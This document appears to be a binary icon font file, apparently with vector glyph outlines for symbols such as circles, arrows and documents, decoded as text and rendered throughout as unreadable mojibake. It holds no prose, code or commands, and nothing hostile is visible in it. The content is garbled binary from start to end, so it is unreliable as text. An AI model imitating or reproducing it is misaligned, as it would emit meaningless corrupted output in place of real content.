�k�y�&j&�em�m�*���a�6.'32>7>&'#"&'32>7>'aK\j77j\KHYe55eYH~!|F)N!

,TJ="
"�E�wl//lw�E+XXV).L66L.)VXX+��>K-?'@�5*0�A���)-#54&#!"3!26=3!#";2654&+5!5!�&�@&&�&��� 

�

 @�@���@&&�&&@��
��

@
@�@�!-48181!8181!5!"3!2654&##"&54632!537������&&�&&�8((88((8@��@�@�@&�&&&�(88((88�����������,<HO#54&#!";3!2654&#8181!81!"81!8181!81#"&54632!537@@&��&&@&�&&�&@��&�����8((88((8@��@�@@&&�&@&&&@��@&��(88((88�������@+?C32>54.#"#.#!"#"3!2654&".54>32#530!8L++L8!!8L++L8!��$0�0$�&&�&&�&;gM--Mg;;gM--Mg���`+L8!!8L++L8!!8L50PP0&��&&@&��-Mg;;gM--Mg;;gM-�@���	L#32654&!";74.#".54>32.'>54&'>5 @@
�

@�P��jj��P4F),Aq�VV�qA,)F4��@
�

��
�@j��PP��j.X)9*L;'�
*V�qAAq�V*
�D';L*9)X.���*3#".54>32#".54>32�@#=R..R=##=R./S�#=R..R=##=R./S�� !:,,:!!:,pr�!:,,:!!:,p@@(,.#"32>7>54.'
�6qvy??yvq66qvy??yvq6��@�� )TY[//[YT))TY[//[YT)�����	@@"!#535#535#53!!#535#535#53%��������@����������@��@�������������������@@+/4632#"&%4632#"&54&#!"3!26=!5!�^BB^^BB^��^BB^^BB^&��&&�&����B^^BB^^BB^^BB^^�`&&��&&`��������'3?K[!"3!2654&"&54632"&54632"&54632"&54632"&54632.#!"463`�B^^BB^^��(88((88((88((88�(88((88�(88((88((88((88X:�B^I7&^B�B^^BB^�@8((88((8�8((88((8�8((88((8�8((88((8�8((88((8�7I^B�:X}&@����".#"32>72#"&5463�#Wcn:j��PP��j:ncW#��@))))
)B/P��jj��P/B)M�))))��2�!.'1897!5.'>&2IeF--FeI{j�f
Q.�.Q
f�jd6aWM!!MWa6\ɋ&GX|&&|XG&������O">7>54.#".'.#"3267>7!5.'32>54.#,N'8" 8K**K8 "8'N,+K8!!8K+,N
))3�3))
N,+K8!!8K+7"

(YN-+L8""8L+-NY(

"!8M++M9 #
 8_L8&&8L_8 
# 9M++M8!���@�	��@@����"F[e�4.'81#0130412>5"&'.'.5467>7>32467#*10232.'?>'"&'.'.5467>7>32#0SE~�ii�~ES0#�				��$B&3773&B$t�Rv	vK�c90AE"Q./Q"EB0:c�L�� .wBBw.!

!.wBBw. 6'K#_X_#K���
0B
....
��$EQ2.#"'>3%>32.#"1.#"'>7>324632#"&�O�4Z#]55]#Z4�O�;.hs|@@|sh.[$T\c33c\T$�(LGC[6~��MM��~6[CGL(*UWZ--ZWU��%%%%�<5Z#((#Z5<E-F//F-[$8&&8$�)17[6T::T6[71)		��%%%%���%Do4.#"!'>.54632'>54&#".54>32''>54.#".54>32P��jj��P1Y{I�I{Y1��%%3,:K55K:,KDW(F]55]F(WDK�I/P: 2WuBBuW2 :P/I<dH(Gy�]]�yG(Hd<�j��PP��jS�}_  _}�(%%;;	F.5KK5.F	�O5aJ,,Ja5O����;O`5BuW22WuB5`O;�SkE]�~JJ~�]EkSp-AU4632#"&>54&'.54>7#.54>7>54.�K55KK55K&>,,>&!''!��'!&>,,>&!'�$4!6W>"">W6!4$�6W>"">W6!4$$4�5KK55KKN;HT..TH;4�SS�4��S�4;HT..TH;4�S@zn`("]o~DD~o]"(`nzp"]o~DD~o]"(`nz@@zn`����
.2654&#"#".=##!5#5>=�B^^BB^^"#=R..R=#@(E]6�@�6]E(^B�B^^B��B^`.R=##=R.``8bM1�@@�1Mb8`@����&!"&5463!!"3!181"389!5!��`(88(`��5KK5� 

`��@��8((8K5�5K��@

@@H@#'8#";2654&#53%#";2654&#537?>'.�

�
-��`�

�
-���� ���@
�@

�
�@�
�@

�
�@OW��	W;��@�'-%5#35#3#35#3#35#3#35#3##!53!5@@�@�@�@�@�@�@�@@@@��@��@�@@���@@���@@���@@��@@@���@@����#!"3!2654&!!!!!!!!!!`�(88((88H�@�����@��@��@��@�8(��(88(@(8����@@@@@�@����'1!"3!2654&!!!!!!4632#"&#"!54&`�(88((88H�@�����@��@@8((88((8��(8@8�8(��(88(@(8���@@@@�(88((888&@@&@����!7.'.'.#!"3!2654&''#5#!"&54630:1;�-3')�!//!�!/�%
�)�	� 		���
��3-/!��!//!p)'6)�
%��		`	�
@����"8K.'.'.#!"3!2654&''#5#!"&54630:1;.#!"463!.�-3')��!//!`!/�%
�)o	��		s�s
��')��!/%	�[3-/!� !//!�)'6)�
%�		�	�
�/!� ,.	@����!7ESa.'.'.#!"3!2654&''#5#!"&54630:1;!"&5463!2'!"&5463!2'!"&5463!2�-3')�!//!�!/�%
�)�	� 		���
�@

�

�@

�

�@

�
�3-/!��!//!p)'6)�
%��		`	�
�



�



�



@����+3I%!575#"&546327.'.'.#!"3!2654&''#5#!"&54630:1;@����8((88((8V-3')�!//!�!/�%
�)�	� 		���
�@�@����(88((88�3-/!��!//!p)'6)�
%��		`	�
@����#9a.'.'.#!"3!2654&'1'#5#!"&54630:1;..#"326=%.#"32654&'�-3')�!//!�!/�%
�)o	� 		���
���!5KK55K!5KK55K�3-/!��!//!p)'6)�
%��		`	�
G@�8((88(�3�8((88(@
@����$:
.'.'.#!"3!2654&''#5#!"&54630:1;�@��-3')�!//!�!/�%
�)�	� 		���
�@��[3-/!��!//!p)'6)�
%��		`	�
@����%;?C.'.'.#!"3!2654&'9'#51#!"&54630:1;!!%7'�-3')�!//!�!/�%
�)o	� 		���
�@��@���3-/!��!//!p)'6)�
%��		`	�
��������
@����%;?CGKOSW[jn.'.'.#!"3!2654&'9'#51#!"&54630:1;3#;##3#;##3#;##3#;#;26=4&+5##5�-3')�!//!�!/�%
�)o	� 		���
��������������������������P����3-/!��!//!p)'6)�
%��		`	�
@@@@@@@@���@�@@���!!!%#35!#!35!��@�����e�@��e��@������e������ee���@���
47=#54&+"#!'#58138154&+3#!35#"3!!#!35!��&�&����@
@ ��� @

 ��@e��@@@&&@��@@��
@���@@
��
��[e�@���
	
%	7%	7��V�����g��g��g��g���������3�3�3�3�@!!����@��@@@
%!!!@������ ���@��@��@'!!##5#53533@��@��������������@�����@	'!!!5!@��@�����������@�@'!!'333@��@�ࠀ����������@'!!###@��@�ࠀ��������"���!"27>54&"&54632��0�$�(���(88((88��$(�d�0���8((88((8"���.!"27>54&"&54632#"2?��0�$�(���(88((88�x P0�$�(��$(�d�0���8((88((8� �$(�d@@#'+/37;?3#3#3#3#3#3#3#3#3#3#73#73#%3#%3#'3#%3#���@@�@@�@@@@�@@��  �  �  ��@@�@@�@@@@@@@@�������@��������������������������@@@@@@@@@@@@@@9���"&*.26:>BFJNRVZ^bfjnrvz~��������������������������!!1!3#%!!1!3#!!1!3#3#;##3#;##3#;##3#3#;##3#;##3#;##3#;#3#%3#73#'3#%3#;#73#;#73#;#73#;#73#3#%3#73#;#73#73#3#%3#73#73#;#73#3#%3#;#73#;##3#73#73#@�@�����@�@������@�@�����@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@�@@��@@@@@�@@@@@@@@@@�@@@@@@@@@@@@@@@@@@@@��@@@@@@@@�@@@@@@@@��@@@@@�@@@@@@@@@@@��@@@@@@@@@@@�@@�@@�@@��@�������@������@�@������@@@@@@@@@@@@@@@@@@@�@@@@@@�@@�@@�@@�@�@@@�@@@@�@�@@@�@@@@�@�@�@@�@@@@@@@����,1''#"&546?'&"7>322764'	@����J !%6 J@��J !%6 J@T���������J 6%! J��@J 6%! JT@���������0%#"&54632#"&54632!4&+33!5!"&585�8((88((8�8((88((8�%��0K5�% (88((88((88((88x�%@�d45K@%����';?C"32>54.".54>32535#5##3#3353+53#53�c��KK��cc��KK��cP�i<<i�PP�i<<i�0��@����@��@@�@@�K��cc��KK��cc��K��<i�PP�i<<i�PP�i<��@@@��@@@��������'r"32>54.".54>32&+"&'32654&+532654&+>;27>'.+"#";#";;2676&'�c��KK��cc��KK��cP�i<<i�PP�i<<i�o
-�2	�

��

�	2�-
J+�:X#

  

#X:�+J�K��cc��KK��cc��K��<i�PP�i<<i�PP�i<$

@

$%+I7

@

7I+%����'V"32>54.".54>327#532654&+546327>'.#"#";!2654&#�c��KK��cc��KK��cP�i<<i�PP�i<<i�0�`

`8(,
J+B^ 

  

�K��cc��KK��cc��K��<i�PP�i<<i�PP�i<�

 (8%+^B 

�

����'b"32>54.".54>322654&+76&'&'.#";#";326=32654&+53�c��KK��cc��KK��cP�i<<i�PP�i<<i�0

D_ee_D

``

`

`

``�K��cc��KK��cc��K��<i�PP�i<<i�PP�i<`

����

@

`

`

@@@#'+/!"3!2654&!2!546!"&5!%3#73#73#���(88(@(88��@
��M��
���@@�@@�@@@8(��(88(@(8@
``
��
 ��
����������#'+;G!"3!2654&!5!%!"3!2654&!5!5!5!!"3!2654&##5#53533���&&@&&��@��&&@&&��@��@���&&@&&�@��@��&��&&@&�@�&��&&@&��@�@�&��&&@&���@�����/?N\"32>54.4632#"&1'>54&'79.#"'>32.546773267#"&j��PP��jj��PP����pPPppPPp^�	

	��I11I'V..V�ޱ	

	��I11I'V..V�P��jj��PP��jj��P�PppPPpp[I11I'V..V'I�	

	���I11I'V..V'���	

	�����)#"&'.54676.#"130>54.�0 00`00PP0$HTB<*-I[//���0<H<>TV@0PP00`00 0VT><H<0���//[I-*<BTH$���:.546'.#"&'&67>781>31:3:31281�biS!f==f!Sib%If�[[�fI%�*a	&$$8$#

#$8$$&	a*>&.##.&>@����#'+!2#"&5463!54631323#3#3#3#���5KK55KK5���K5�5K�@````````���K55KK55K�@5KK5��@�@�@�@!"3!2654&!7!	%���(88(@(88�������ggg�����@8(��(88(�(8�Z����&�6nn��"�����#35%7'7 ``���'i�``��@�@�``����'���``@@�@���@�"10>54."&54632BuW2dxddxd2WuBPppPPpp�2WuBx�̂��xBuW2�pPPppPPp���@�'3"10>54.".54>32'4632#"&BuW2dxddxd2WuB)G55G))G55G�I33II33I�2WuBx�̂��xBuW2��5G))G55G))G5�3II33II����!*'.5!"&'&676#!2	 � 

�
�@	��p
^�@��
�@
@
������!$2"32>54.4>32.5
"&'%#j��PP��jj��PP����Aq�VR�8�d�4<�nIR�8��4<Aq�V�P��jj��PP��jj��P�V�qA<4��d8�RIn�<4��8�RV�qA���%%%@���@���������� �@����%%%
%%%%�����`@`��������������Rf��f]��]R]x] @�%+2#5267>54&'.#"33>!3�]�zFFz�]G�225522�GG�2&2	���Nv����Fz�]]�zF`522�GG�22552&_4�Q�g;���@����-%'3"32>54.".54>32�Ӏ��j��PP��jj��PP��jP�i<<i�PP�i<<i�����P��jj��PP��jj��P��<i�PP�i<<i�PP�i<���"32>54.'3j��PP��jj��PP��)Ӏ�Z�P��jj��PP��jj��P���Z@����'7EK"32>54.".54>32>54&#"1%.#">#!5]�zFFz�]]�zFFz�]K�a99a�KK�a99a�\
pP.P2[QE��P.Pp
EQ[�@@Fz�]]�zFFz�]]�zF��9a�KK�a99a�KK�a9�0Pp)"
'6E(�")pP0(E6'���@���:]%4.54&'.'4654&#"3267>5041.#".'.'>7>32O`P!2@$&&)F3P`P<k�V<%%<V�k<�(_4I22I4_(8:

:8 JPU++UPJ 8:

:8�lhHPT
*K=+
$$4GZ1TPHhl3)&&)361DD1			
		
			@���� A5354&+"332>54.#"&'.5467>7326'�%�%�Q�g<Aq�VV�qA<g�q-u@@u-.00.+p==p+.00.�A@%%@AFo�RV�qAAq�VR�oF��.00.-u@@u-,0��:0,-u@@u-����#'373#73#73#3#73#73#3#73#73#%3##5!#5#!!!@����������������������������������@���@��@@�����������@��������@@@@��@��#'!!!";!32654&"&54632!!����&&��&&��%%%%%�����@&��&�&@&�%%%%�@@@�@#'+/37;?C!"3!2654&3##5%3##5%3##5'3#3##53!5!#535#535#53@�&&&&�&���������������@@��@@@@�������@&��&&�&��@����@����@����@�������@�@��
!!!!!'@����� @@���������@@@@
4&#!"#!5!5!7!81!81�&��&��������&&����@@���@�#!"3!2654&!!"&546327!!�@(88(�(88�x��%%%%��8(��(88(@(80 ��%%%%�����@� !"3!2654&"&54632#%!!��&&@&&�� ��@�&��&&�&�.��@����!"3!2654&"&54632%!! ��(88(�(88��


��@�8(��(88(@(8� 



`���/O.'7'&"#132>7>54.#".'.5467>32�B�J�@� �@�-YVS(6qvy??yvq6�)TY[//[YT))TY[//[YT)�	�@�@�	)TY[//[YT))TY[//[YT��6v??v66v??v���!/=	.#!"3!2654&##'#5!'!"&5463!2!"&5463!2��
�@
�%�%<�������@

�
3��

@
4@����%% 0��+�ի



�



���!	.#!"3!2654&##'#5!��
�@
�%�%<������4@����%% 0��+���!3!265	35!37!@���
�
������[@J@���`

������@@�!3!265!5#	7!@���
�
����@@�[@J@���`

�������@@���	###
-'%����H�[�[H�����Ha��aHi������33	3
-5%�������%�[�[%����pcm��mc�������!!!3#!3!3��������@@K5�������@5@@7!265!%3#!!��Pp�p�@@���@@pPPp�@�����+A"32>=4.".532>=".532>=j��PP��jj��PP��jj��PP��jj��PP��jj��PP��jj��PP���,:!�!:,,:!�!:,��,:!�!:,,:!�!:,��,:!�!:,,:!�!:,�!"'!'>32>54.#5d\R#���5�PP�i<"0U(@-P��j�'7#����4<<i�P+QIA`#Vbl9j��P� 7.54>32!.#"-@(U0"<i�PP�5���#R\d5j��P�9lbV#`AIQ+P�i<<4���#7'P��@����
>.	6�+&8�������FO@M��e�����������5	5&&>@�����8&+iOF��������e��Mr�����75	5.7+&8�������FOi�M��e��������r@����%	>&''������8&+iOF�ɸ����e��Mr������"2#"&'5>54&'.54>j��PP��j()Z]`03M,F1P���Aq�VV�qA)3
W4HR\1V�qA����!N%#"&'#".54>322.#"*#"&'5>54&'.54>@$4Y )<iN--Ni<<iN-��h��R%Q*H�359()Z]`03M,F1P��;"8(#(F]55]F((F]5*Kx?n�U1-/{D"@)3
W4HR\1V�qA����$H12#"&'5>54&'.54>3.'#"&'2>7>7>54&5�c��KK��c&&SWX-0D)B.K��c2*M�C H�57hbY''>6?TF�=i�PQ�j='/
Q1
CMV.P�i=��*E&B% !0 K),^1-wDN�.���3W">7>3:3267>7>54&'.'.#512#"&'5>54&'.54>)O&#>253/ )O&#>2552>#&O)j��PP��j()Z]`03M,F1P��

")d6;3.		


")d66d)"

�Aq�VV�qA)3
W4HR\1V�qA����!n%#"&'#".54>32>7>3:3"&'5>54&'.54>32.'.'.'.#"@$4Y )<iN--Ni<<iN-��253/ ()Z]`03M,F1P��jh��RC"	2(>#&O))O&#>;"8(#(F]55]F((F]5*K�)d6;3.		
�)3
W4HR\1V�qA?n�U*N "



"����3X|">7>3233267>7>54&'.'.#512#"&'5>54&'.54>3.'#"&'2>7>7>54&5�&I"!9-0./&I"!9-00-9!"I&c��KK��c&&SWX-0D)B.K��c2*M�C H�57hbY''>6?TF@%Z05..	%Z10Z%�=i�PQ�j='/
Q1
CMV.P�i=��*E&B% !0 K),^1-wDN�.@�@%5>54.#"!4.@5K$NHHN$K5Q�g;�;g��5�J<iN--Ni<J�5-CW00WC-����A%5>54.#"!4.>7.'.5467>7.#"!>75K$NHHN$K5Q�g;�;g���*e9	P9
OZHN$K5Q�g;
�5�J<iN--Ni<J�5-CW00WC-)
*Y-Aw20<:E-Ni<J�5-CW0
	���2>%4>7>54.#"!."32>54.##5#53533�"=U2$NHHN$K5Q�g;�`<iN--Ni<<iN--Nid�@��@��9gVB<<iN--Ni<J�5-CW009-Ni<<iN--Ni<<iN-����@�����26%4>7>54.#"!."32>54.!5!�"=U2$NHHN$K5Q�g;�`<iN--Ni<<iN--Nid��@�9gVB<<iN--Ni<J�5-CW009-Ni<<iN--Ni<<iN-��@���#	'!5.'5>54.#"!���`@�`��@2�K5K$NHHN$K5Q�g;�`��`@�``s&5�J<iN--Ni<J�5-CW0���4632#"&#'#"!4&@pPPppPPp�#�J``J�#`  PppPPpp��lt``���pP��@Pp@=2#".5'4>3">!2#".5'4>3">�.R=##=R..R=#Fz�]@u-	I.R=##=R..R=#Fz�]@u-	#=R..R=##=R. ]�zF�0.
#=R..R=##=R. ]�zF�0.
@=".54>32#5267>7!".54>32#5267>7 .R=##=R..R=#Fz�]@u-	��.R=##=R..R=#Fz�]@u-	@#=R..R=##=R. ]�zF�0.
#=R..R=##=R. ]�zF�0.
@����";W>54&'!!>54.'4>75.51!.=467>7!!.�4U=!��!=U44U=!z!=U4��9S66S9�9S66S9�661�f1666M�M�!^s�H  H�s^!!^s�H  H�s^!�@FhMdMhFFhMdMhF"G@G3 2G@GxKLw8��#/BUht4632#"&4632#"&4632#"&4632#"&81463281#"&5%81463281#"&581463281#"&54632#"&�K55KK55KK55KK55K�%%%%p%&&%��%%%%��&%%& 9'(88('9X****@5KK55KK;5KK55KK�%%%%�%%&&V%%%%p%%&& '99'(88(��**** ���:r.'.'.'.7>7>7>7>7:3265<51'.'.'.'.7>7>7>7>19$#T.-a11_,-O!!46!"N++Z..Y))K1	%f3I((U**S'&E,.C%%O''M$#@)

!�2c-.R"#57#"Q-,^//\++M  24! L)4%�(G.1G&'Q))P%%B+
-A$#K&$3����
-?Pbp�����"&=4632"&=4632"&/&676#"&/&676#"&/.7>"&/.7>#%#"&546;2%81#"&54638132#"&'&6?6#"&'&6?6#"&'.?>#"&'.?>#####�Y-Yf	Z
Z	�7�*�
_��
�o����

���

�$			�m�

��7
		Y	 		Yf
Z
Z�#�##�#�J����-�-��	���Z
*Y*��Z
Z��$	Y

$	ZuZ
Z��!�	 �
x�

����*4C467'7.%>54&'7.'>75#"&'3267'��*;&r'-�-'r&;*��Ep!�RgyB��!pEBygRTC##Cr7}CC}7r�		<07h_T#�+o>>o+�#T_h70<	1S;<:cL1œ;S�1Lc:��!!����'Z"32>54.2#".54>#".'.54>7813267>4&'7j��PP��jj��PP��j5]F((F]55]F((F]fGMT++TMG/  /C11110{CC{01111C/  /�P��jj��PP��jj��P�(F]55]F((F]55]F(��/  /GMT++TMGC2{�{2/33/2{�{2CGMT++TMG9����)6BObn4632#"&81463281#"&4632#"&4632#"&5%4632#"&4632#"&581463281#"&5!#"&54632�K55KK55K�>++>>++>g8('88'(8��2$$22$$2��. !--! .i****w&%%&�C00DD00C@5KK55KK��+>>++>>�(88('88I$22$$22$p!--! ..0****&&%%0DD00CC��F#/;GS%4632#"&4632#"&%4632#"&4632#"&4632#"&%4632#"&4632#"&�8((88((8�`8((88((8@8((88((8�:8((88((8L8((88((8��8((88((8L8((88((8 (88((88�(88((88((88((88N(88((88��(88((88((88((88t(88((88���8".'.5467>732>54&'.'7#3c\T$$8&('%h?+3U!Aq�VV�qA!U3+?h%'(&8$$T\c3@&8$$T\c3I�=;_VM11q;V�qAAq�V;q11MV_;=�I3c\T$$8&���3">3232654.2>7#".54&#"i��RCq�UV�qA8((8P��ji��RCq�UV�qA8((8P���N��h[�vDFz�](88(j��P�N��h[�vDFz�](88(j��P���D�1812233332323023323:323232013023181263623263263>7>7>7>7627267>7261263>7>7>7>7>3>7>7>7>7>7>7>7>7>7>7>7465>7>7467465>7465465645045>5465<5645645<12650451814&5&454&54&5.'.'.'.'&4'4&'.'4&54&5.'.'.'.'.5.'.'.'.'.'.'.'.'.'.'"&'"&#.'.'.#.#.#.'"&#"&#0"#.#"&#*#&"#&"#*#4&#0"#181"#"#"#"#"""#"##0107041465>7467465>7461465>7>7>7465>5>7>7>7>7>7>7>7>7>7>7>7263>7>7263627263>3623623021627:3:7:3263:3:3:323:323021209>720222321233322110109011"#"#""##"#"1*#"*#**#"#*#*#*#&"#*#&"#0"10"9"&'.'"&'"&#.'"&1"&#.#.'.'.#.'.'.'"&'.'.'.'.'.'.'.'.'4&5.'.'4&5&4'4&5.5&45"41<1&4'<5<'<54&5<5<5<5645<5645041049.'	
%	


	%	
&


		$J


#





"


�	



	%	
&	



	%	
%A





"





#���-!7.#"3267>7#".54>327���7�MM�76::67�MM�7	`#Vbl:j��PP��j5d\R#�@�6::67�MM�76::6	T(A-P��jj��P'7#����)7ES!!%!!#!!!#"3!26533!2654&#"&546;2#"&546;2#"&546;2@������x8���8**0*�*0**�����@

@
o���@@@���*��**x��**0*��



�



�@



����"6%'.>54.#"326776&".54>32��'+1<i�PP�i<<i�PG�2�K��5]F((F]55]F((F]Y�2�GP�i<<i�PP�i<1+'�K(F]55]F((F]55]F(����"6B%'.>54.#"326776&".54>32##33535#��'+1<i�PP�i<<i�PG�2�K��5]F((F]55]F((F]������Y�2�GP�i<<i�PP�i<1+'�K(F]55]F((F]55]F(����������"6:%'.>54.#"326776&".54>32!!��'+1<i�PP�i<<i�PG�2�K��5]F((F]55]F((F]����Y�2�GP�i<<i�PP�i<1+'�K(F]55]F((F]55]F(@����
!7')'7''77'7�`��`����`�������`����`�����`�������`����`��`�`��`�����
!'7''77'7)7'@���`����`����`��`����`����`����`��`����`�� ���`�����
''7'!7��`������`����`��`���`��������
''7'!7���`����`����`��`���������!-";535353732>54."&54632�BuW2�{%@���S6BuW22Wu(88((88�2WuB�{�%@��S	
2WuBBuW2��8((88((8����$)9'./.35353535676&'"'&4?62�e5e9��F�� ����	�6���.8-���-
	��		-
		�e5e�6����@��GF9��.7-���-			
-		��	����##54&+"#"3!2654&%46;2!PqO�Oq �\&�&��OqqO�� ��&&�����#2#54&+"32#!"&5463!5463Oq�&�&���qO�qO��&&�� ��Oq����'%>54.#""/3267?6&�3-Ni<*�f6�-Ni<%D�3e��D%<iN-�6f�*<iN-�3e3�37OS54&+"#3;26=!5534&+"!!;26=35#534&+"#3;26=!5!53�����@������@�����������@����@�����������������@����37OS326=4&+5##";33#26=4&+##";35'3#26=4&+5##";3'3#��������������������������@�@�������@������@������6J.>7'#".5#&'>323467>7.'".54>32�	/#e2(G5�

>HM#e%
	.#e2(G5�

>IL$d%
�Z+K9  9K++K9  9K^#LI>�
5G)2#.	�
$#LH?�5G(1#.	�$m 9K++K9  9K++K9 ���0<��%7'./#'737>77'>?5'.'"&546325'.'7'.'7'.'7'./#'''77737>77'>77'>77'>?"&54632l)-:	@	:-)FF)-:	@	:-)FF�%%%%C9C'.8
;%@%;
8.'C9CC9C'.8
;%@%;
8.'C9C��:QQ::QQ�:-)FF)-:	@	:-)FF)-:	@	�%%%%�@%;
8.'C9CC9C'.8
;%@%;
8.'C9CC9C'.8
;%kQ::QQ::Q����%&"'!'#72?64'��'�.���DΠθ.(q�.�.�DΠθ'��q(	����/3'#3#3#5#3#3#%37'	&"2?64''7�@��@@��@@�@���@@@�@�@2��(<|(<��@��@���@@�@@@���@�@�N|<(��<(R�@����)#54&#!"#"3!2654&%!!##5#53533��&�&�5KK55KK������������&&�K5�5KK55K���@��������=5#.'3'#4&1>54&#"0#'3#3#73326737#>7�%�F>:�pPPp�:>F�%��|F>:p,�JJ�,p:>F|�@7a(�OppO���(a7@"A���:EE:�A"����"32>54&'7.#�]�zFFz�]]�zF@SgyB��Fz�]]�zFFz�]6e-�7\A$�@���N7!!3"&5463:37.54632:3:3.54632#*##"&5467'*#*##�����(88(h8((8h�	8((88(�	8((8hh8(@���8((8�(88(�*(88((8��(88(��(8@7!!3#3#3#3#�������������������@����@���@#'7;#";2654&#3#";2654&#3#";2654&#3 �

�

��@�

�

��@�

�

��@
��

@
���
�@

�
�@@
��

@
����$0<5!#3267#"!4&+5>7326=#"&=3%#"&'>=3@���pP"g=@5KK5@=g"Pp���0Dt
�D0
t���Pp2D
�K55K�
D2pP��D0@@9t0D9@@����*:TX\`d>7>76&'.#".'.#"#3!3#'>32#>%&67>312&"'.'.'!!5!5!!!7!5!
 -%K 1=2-:,%	+$�@@�b1 !S&34�q	 
)3O���@��@��@�
<"<"2}11y,&s,��@��N !.+k	

O3)��� ���� ����@�)8.#!"#"3!2654&+>7>54&%!!<5467
�$/,"T/`

@

`/T",/����		1r<O�8+9��



H9+8�O<r(Y//Y(���}@#>'.#!"#"3!2654&+!'y	�@	9`

@

`�d��d

�r��



~������7;#54.#"32>=32654&%.'>7>32#"&#53��<i�PP�i<<i�PP�i<�%%��"		",k99k,"		",k99k����`!:,,:!��!:,,:!`%@%>				��� ����5";26'>54.!####;;26'3265#�(F4T@ $ $ @T4F]5((5
S$ $S
�#=R.Oy��&&yO.R=#��@��@�`
�&&
����=.#">30030&73267>7>7>74&'�)hu�BQ�|c" ##���s_��D/
�*K"X�/)5+<V=:2"5M1/m>7zAk��NHvW$S.$T`k;�j()$`4(TRO#���	#0>	1%5�����Ccp,���@@����
�bH2taA��@@���S2!.54>>5#53.'#53.'.'#5.#"#53#3#333>j��P&Fa;�;aF&P���-ZUj@#R-@  @-R#@jUZ-	�%6%�	�P��jH�s^!!^s�Hj��P��CJO)@"@@	#2FUUF2#	@@"@)OJC����5G"32>54.>54.'>7>32#"&7+"&=4673j��PP��jj��PP����	2F)8.7�MM�7.8)F2	.j99j�

@

 �P��jj��PP��jj��P��1/UF5?s/6::6/s?5FU/1  �@

@�
����6%7>726376&/."?065>??6&'��g
�"@'ag�!
@'�
2	,�'A"�gb'@
!�
h��	3	O����2&67>10>'6.'.1.'A3 (+(
%C^,
'�]B�%a[C	9N((&	8jQ@k�9?hRD!RPE/���Lu�(q u�R<}yq20L.+QPQ+<h`[.D���� %532654&#!";3!26%53!��� 

��

 ��7Ij�jI���



��[���Y��@����7!#"&5!32>5#"&'.'33267>=3��@pPPp@�@Fz�]]�zF�5�KK�549$o#(%&`55`&%(#o$94���PppP@��]�zFFz�]��59955�JE��5`&%((%&`59��J�5@����	
-13!265#3#3#3#3#54&+"#"!54&!#53�&@&�@@�@@�@@�@@����@������&&�����@��@��@�@PPPP?@����
!!%5!!7!5!#53��@����@@����@�����@@�@@#;!54&#!"!"3!2654&%81!81!#+"&=!+"&=#5!��&�&�&&�&&���@�
@
��
@
���@&&@&��&&@&@@�`

``

`@���'''.3?5!����۬&Z&�ۀI��@��@�I�۬&Z&��ۀ����@�@'+#54&#!"332654&'!32654&'3%53��&��&@Q	K55K	b	K55K	Q���`��&&�@!5KK5!!5KK5!������!###!!%3�@�� � ��@ @�� � @����6����4632#"&%'#%37�8((88((8�J�n@�nJ�<��<�`(88((88��<��<���W��a����)5?JU#.'5##335>73'#.'5"&54632#>3.'5>73e
=\uC�Cu\=
ee
=\uC�Cu\=
e�d>)(G9(��%%%%[)>d	(9G�d>)(G9(	Y)>d	(9G(Cu\=
ee
=\uC�Cu\=
ee
=\uC�)>d	(9G�%%%%Yd>)(G9(��)>d	(9G(�d>)(G9(	@����	%0%6&>7%��@�@����	0c�zz�c0	�H�H���G9��9G�^���;;���^�����	!	!�������������@����-1#"&'.5467>7532>54.%3#�2.00.-u@@u-.00.2EvU0Fz�]]�zF0Uv����-�"-u@@u-.00.-u@@u-"�Sp�L]�zFFz�]L�pS��Y�''7''7'2?>[�f�[�sWWs3�D$F-�B�9yuk�[�f�[�sW�Ws��+kuy9�B�-F@����"06!4&#"!"3!2654&%2#"&546!33!26=3'7%���K55K��

@
�S%%%%���
�
��@�:�:@5KK5
��

@
@%%%%��`

`�e�:r�:@���)%!!!!!!'#5#53#575#53#535#535#5�����������@@@�����������������@��2@�<2@��@@@@@���!!%!!!!%!!!!%!!����������������������������������#/!!!!!!4632#"&4632#"&4632#"&������������K55KK55KK55KK55KK55KK55K������@5KK55KK��5KK55KK��5KK55KK���UY]ae%#54&#!5326=4&+";!"#";26=4&+5!#";26=4&+5!#";26=4&#53#5353#53�B.�����.B����܀�����������.B����B.���������������@���@�@@�!!!!!!@����������@�@�@`!!!!!!75'�������������@�@�@��@��@`!!!!!!7�����������@�@����@`!!!!!!7�����������@�@�����$4&'.#".#".#"3!26L9&AU19a!7 8N	(G55G(�Hf.>^0U?$1*N7
4G((G5f@(/.#".#".#";732654&''3533{&AU19a!7 8N	(G55G([��oHfL9������X0U?$1*N7
4G((G5��fH>^�(���@�&->54&#".#".#";!532654&#5#7|^B
d@Be$5]F((F]5��B^L������>	B^:KN<(F]55]F(��^B;X����"(>54&#".#".#"3!2654&'77|^B
d@Be$5]F((F]5`B^L��@`�@�	B^:KN<(F]55]F(^B;X�@`�@�#'#!5!!##	���ࠀ��@��  ���@@�@���� �
7!!%!5!!5!%	##����`  �@@�@@��� ����	33!!#53����`� �@���������@��!!#53	##� �@���`����@����@����%,8DKSYdou~����"32>54.>73##>73!#53'5#'>7>7#>7#>73.'373#..'.'.'53'537.'3#7#.'%>7#>3.'.>73�c��KK��cc��KK����
p���
p�	���
&��&
�u�	���
�1��	�
&P&
���	Qp
�@`& :�{: &`)`& :y: &`�K��cc��KK��cc��K��A!!@@A!!@@!�@�+)R+�)��!@��@!!A��@��+)R+�)��!@�!A@!�,M)#F)M,#�
,M)#3)M,#���c"32>54."&'>=4&#".5.+".5467326?>=>323:3j��PP��jj��PP��j/Y)�
*TB)�

n,F3u�A!5c,F&IQY�P��jj��PP��jj��P�@`
%,%
�	7�O_j94`,�M	
G&&GE_wF 1#S����/\"&'.46?>32"'&4?64'.#"#"&'.46?62326?64'&4762#�
#$$#�#Y11Y##$$#X,X))33�))
�1Y##$$#X,X))33�))+#$$#�#Y1D$Z^Z$�"%%"$Z^Z$W+X)t)�)t)+��%"$Z^Z$W+X)t)�)t)+$Z^Z$�"%��� 3#267#"&'.#">32��@>ff>>ff�#d9Hw!!wH9d#��}�b�~]}H'27>4&'."01267871'01"&'.46787162"'&47�A��(((s(�!""!"UXT"�g/////v{v/A��"TXT!"!!"�(r)((�z
'


EyA��(r)((�"TXU"!""!�g/v{v/////A��"!!"!TXT"�(()r(�z

&
